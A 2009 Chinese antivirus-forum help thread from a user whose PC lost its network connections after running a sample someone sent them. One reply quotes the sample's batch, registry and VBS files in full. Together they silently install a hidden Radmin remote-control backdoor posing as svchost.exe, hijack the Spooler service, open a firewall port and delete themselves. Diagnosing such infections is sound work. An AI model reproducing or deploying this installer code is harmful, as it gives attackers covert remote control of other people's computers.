瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 日志已补 网上邻居属性的本地连接全消失,杀毒软件不加载 IE浏览器 马桶都打不开

1   1  /  1  页   跳转

[求助] 日志已补 网上邻居属性的本地连接全消失,杀毒软件不加载 IE浏览器 马桶都打不开

日志已补 网上邻居属性的本地连接全消失,杀毒软件不加载 IE浏览器 马桶都打不开

请哪位大侠帮帮忙~~
运行过程序  附件2

附件: uxpay.rar (2009-6-9 10:38:03, 286.09 K)
该附件被下载次数 326



用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

附件附件:

文件名:SREngLOG.log
下载次数:154
文件类型:application/octet-stream
文件大小:
上传时间:2009-6-9 10:38:03
描述:log

附件附件:

文件名:SREngLOG.log
下载次数:193
文件类型:application/octet-stream
文件大小:
上传时间:2009-6-9 10:45:05
描述:log

最后编辑conkay 最后编辑于 2009-06-09 10:46:07
分享到:
gototop
 

回复:网上邻居属性的本地连接全消失,杀毒软件不加载 IE浏览器 马桶都打不开

奇怪~,好了日志重新放上了。 那个0字节的不要下载~
gototop
 

回复:日志已补 网上邻居属性的本地连接全消失,杀毒软件不加载 IE浏览器 马桶都打不开

Network Connections  服务不能启动 属性不可用~
gototop
 

回复: 日志已补 网上邻居属性的本地连接全消失,杀毒软件不加载 IE浏览器 马桶都打不开

@echo off
sc stop r_server & sc stop radmm
sc delete r_server & sc delete radmm
regedit /s install.reg & ping 127.1 -n 1>nul & del /f /q install.reg
sc stop Spooler & sc config Spooler start= auto
sc config Spooler binPath= "%ProgramFiles%\Internet Explorer\svchost.exe /service"
sc config rpcss depend= Spooler & sc start Spooler
attrib +s +h +r admdll.dll & attrib +s +h +r svchost.exe
del /f /q %0 & exit



Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:e9,d1,48,11,5d,4a,8b,5c,0a,d8,b3,c3,71,91,0c,fd
"Port"=hex:5c,11,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%ProgramFiles%\\Internet Explorer\\svchost.exe"="%ProgramFiles%\\Internet Explorer\\svchost.exe:*:Enabled:svchost.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"4434:TCP"="4434:TCP:*:Enabled:Alerter"

Set lsxq=createobject("wscript.shell")
lsxq.run "install.bat",0
wscript.sleep(1000)
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)


和样本里的 这些 批处理和VBS有关吗
gototop
 

回复:日志已补 网上邻居属性的本地连接全消失,杀毒软件不加载 IE浏览器 马桶都打不开

  是啊~别人发我的~我想试试看威力~就中招解决不了了~现在用虚拟机上的
gototop
 

回复:日志已补 网上邻居属性的本地连接全消失,杀毒软件不加载 IE浏览器 马桶都打不开

我试着启动那个服务 ~说是指定了循环服务依存  1059错误
gototop
 

回复 11F byxxdrls 的帖子

什么意思呢?
gototop
 

回复:日志已补 网上邻居属性的本地连接全消失,杀毒软件不加载 IE浏览器 马桶都打不开

这个叫做服务依存是吧,~如果那个病毒文件被删除,依存它的 都不能启动
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT